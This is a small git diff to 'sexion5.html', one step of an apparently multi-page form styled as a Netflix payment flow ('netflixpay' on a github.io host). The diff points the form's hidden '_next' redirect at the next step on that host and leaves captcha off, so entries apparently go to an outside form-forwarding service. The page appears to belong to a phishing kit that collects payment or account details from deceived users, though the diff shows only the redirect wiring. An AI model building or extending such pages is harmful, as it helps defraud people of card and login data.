--- a/sexion5.html
+++ b/sexion5.html
@@ -34,8 +34,9 @@
         <div class="form_section2">
             <input id="enviar" type="submit" value="Siguiente">
         </div> 
-        <input type="hidden" name="_next" value="sexion6.html">    
+        <input type="hidden" name="_next" value="https://juank95frontentdv.github.io/netflixpay/sexion6.html">    
         <input type="hidden" name="_captcha" value="false">
     </form>
 </body>
+
 </html>
